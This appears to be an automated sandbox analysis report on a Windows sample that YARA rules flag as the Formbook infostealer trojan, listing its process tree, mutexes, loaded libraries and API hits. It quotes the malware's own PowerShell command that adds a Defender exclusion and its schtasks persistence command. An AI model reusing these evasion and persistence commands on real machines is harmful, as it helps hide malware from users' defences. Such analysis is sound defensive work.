Source: UnmxRI.exe, 00000000.00000002.2090039067.00000000038E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs UnmxRI.exe
Source: UnmxRI.exe, 00000000.00000002.2077241511.00000000006BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs UnmxRI.exe
Source: UnmxRI.exe, 00000000.00000002.2101231859.0000000007190000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs UnmxRI.exe
Source: UnmxRI.exe, 00000009.00000002.2229710026.0000000001418000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePrint.Exej% vs UnmxRI.exe
Source: UnmxRI.exe, 00000009.00000002.2230462145.000000000199D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs UnmxRI.exe
Source: UnmxRI.exe, 00000009.00000002.2229710026.0000000001428000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePrint.Exej% vs UnmxRI.exe

Uses 32bit PE files

Source: UnmxRI.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 9.2.UnmxRI.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.2.UnmxRI.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000012.00000002.4497267348.0000000005070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.2230255401.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000010.00000002.4494637924.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000010.00000002.4494563547.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.2231534304.00000000039C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.4495556135.0000000004F30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: 0.2.UnmxRI.exe.2727a28.2.raw.unpack, Ft.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.UnmxRI.exe.36139f0.5.raw.unpack, pxAkq6oWv5iOjnf3uT.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.UnmxRI.exe.36139f0.5.raw.unpack, pxAkq6oWv5iOjnf3uT.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.UnmxRI.exe.4fb0000.8.raw.unpack, pxAkq6oWv5iOjnf3uT.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.UnmxRI.exe.4fb0000.8.raw.unpack, pxAkq6oWv5iOjnf3uT.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.UnmxRI.exe.24d10ec.0.raw.unpack, Ft.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.UnmxRI.exe.6850000.10.raw.unpack, Ft.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 10.2.tehuvFgZlLZK.exe.2917b78.0.raw.unpack, Ft.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, YQdCYQTI3KHXKvUIgU.cs	Security API names: _0020.SetAccessControl
Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, YQdCYQTI3KHXKvUIgU.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, YQdCYQTI3KHXKvUIgU.cs	Security API names: _0020.AddAccessRule
Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, YQdCYQTI3KHXKvUIgU.cs	Security API names: _0020.SetAccessControl
Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, YQdCYQTI3KHXKvUIgU.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, YQdCYQTI3KHXKvUIgU.cs	Security API names: _0020.AddAccessRule
Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, YQdCYQTI3KHXKvUIgU.cs	Security API names: _0020.SetAccessControl
Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, YQdCYQTI3KHXKvUIgU.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, YQdCYQTI3KHXKvUIgU.cs	Security API names: _0020.AddAccessRule
Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, QvFRFSSlmclI2FDck0.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, QvFRFSSlmclI2FDck0.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, QvFRFSSlmclI2FDck0.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: 0.2.UnmxRI.exe.24d10ec.0.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.UnmxRI.exe.2727a28.2.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.UnmxRI.exe.6850000.10.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 10.2.tehuvFgZlLZK.exe.2917b78.0.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@23/16@16/9

Source: C:\Users\user\Desktop\UnmxRI.exe

File created: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4052:120:WilError_03
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5440:120:WilError_03
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Mutant created: \Sessions\1\BaseNamedObjects\lvtQuFzxsXQOCORNnGxcc
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5788:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5756:120:WilError_03

Source: unknown	Process created: C:\Users\user\Desktop\UnmxRI.exe "C:\Users\user\Desktop\UnmxRI.exe"
Source: C:\Users\user\Desktop\UnmxRI.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UnmxRI.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\UnmxRI.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\UnmxRI.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpB814.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\UnmxRI.exe	Process created: C:\Users\user\Desktop\UnmxRI.exe "C:\Users\user\Desktop\UnmxRI.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpD59E.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Process created: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe "C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe"
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	Process created: C:\Windows\SysWOW64\print.exe "C:\Windows\SysWOW64\print.exe"
Source: C:\Windows\SysWOW64\print.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\UnmxRI.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UnmxRI.exe"	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe"	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpB814.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Process created: C:\Users\user\Desktop\UnmxRI.exe "C:\Users\user\Desktop\UnmxRI.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpD59E.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Process created: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe "C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe"	Jump to behavior
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	Process created: C:\Windows\SysWOW64\print.exe "C:\Windows\SysWOW64\print.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\print.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\UnmxRI.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Section loaded: uxtheme.dll	Jump to behavior
